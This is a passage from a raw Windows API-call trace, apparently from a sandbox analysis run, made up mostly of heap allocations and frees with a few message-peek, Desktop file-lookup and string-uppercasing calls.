Size=0x4) returned 0x2a72aa8 [0087.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0087.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0087.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0087.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0087.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0087.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0087.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0087.778] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0087.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0087.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a58 [0087.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0087.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0087.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95e0 [0087.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0087.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0087.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0087.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0087.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b28 [0087.779] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0087.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0087.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0087.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0087.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b58 [0087.779] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95e0 | out: hHeap=0x2af0000) returned 1 [0087.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95e0 [0087.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0087.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73118 [0087.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0087.779] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0087.779] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0087.779] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0087.779] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95e0 | out: hHeap=0x2af0000) returned 1 [0087.779] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0087.779] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0087.779] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0087.779] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0087.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95e0 [0087.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0087.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0087.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0087.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0087.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b58 [0087.779] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0087.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0087.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0087.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0087.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0087.780] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95e0 | out: hHeap=0x2af0000) returned 1 [0087.780] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0087.780] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0087.780] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0087.780] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0087.780] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0087.780] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0087.780] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0087.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0087.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a58 [0087.780] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0087.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0087.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0087.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95e0 [0087.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0087.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0087.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0087.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73068 [0087.780] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0087.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0087.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0087.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0087.780] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0087.780] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0087.780] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0087.780] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0087.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0087.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a58 [0087.780] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0087.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0087.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0087.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0087.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73128 [0087.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0087.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0087.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73118 [0087.781] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0087.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0087.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0087.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0087.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0087.781] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0087.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0087.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0087.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0087.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0087.781] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0087.781] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/7jATM.wav", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4105fa60, ftCreationTime.dwHighDateTime=0x1d5cc92, ftLastAccessTime.dwLowDateTime=0x3135af40, ftLastAccessTime.dwHighDateTime=0x1d5c931, ftLastWriteTime.dwLowDateTime=0x3135af40, ftLastWriteTime.dwHighDateTime=0x1d5c931, nFileSizeHigh=0x0, nFileSizeLow=0x8f23, dwReserved0=0x0, dwReserved1=0x0, cFileName="7jATM.wav", cAlternateFileName="")) returned 0x9a3e80 [0087.781] FindClose (in: hFindFile=0x9a3e80 | out: hFindFile=0x9a3e80) returned 1 [0087.781] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0087.781] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0087.781] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0087.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0087.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0087.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0087.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0087.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0087.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0087.782] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0087.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0087.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a58 [0087.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0087.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0087.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0087.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0087.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730a8 [0087.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0087.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0087.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73128 [0087.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0087.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0087.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0087.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0087.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0087.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0087.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0087.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0087.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a715e8 [0087.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0087.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0087.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0087.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0087.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0087.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0087.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0087.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0087.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0087.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0087.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0087.783] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0087.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0087.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a58 [0087.783] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0087.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0087.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0087.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9688 [0087.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0087.783] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0087.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0087.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0087.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0087.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0087.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0087.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0087.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0087.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730c8 [0087.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0087.783] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0087.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0087.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0087.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0087.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0087.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0087.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0087.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0087.784] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed40 [0087.784] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0087.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed40 | out: hHeap=0x2af0000) returned 1 [0087.784] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0087.784] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0087.784] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0087.784] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730a8 [0087.784] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0087.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0087.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0087.784] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9850 [0087.784] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0087.784] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0087.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0087.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0087.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0087.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0087.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a716e8 [0087.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0087.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0087.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71688 [0087.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0087.786] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0087.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0087.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0087.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0087.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0087.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0087.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0087.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0087.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e9c0 [0087.786] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0087.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e9c0 | out: hHeap=0x2af0000) returned 1 [0087.786] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0087.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0087.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0087.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0087.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0087.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71688 [0087.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0087.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0087.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0087.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0087.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0087.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0087.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0087.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0087.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0087.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0087.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7000 [0087.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0087.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0087.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0087.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0087.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0087.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0087.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0087.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0087.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7000 | out: hHeap=0x2af0000) returned 1 [0087.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0087.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0087.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5edc0 [0087.787] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0087.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0087.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a58 [0087.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 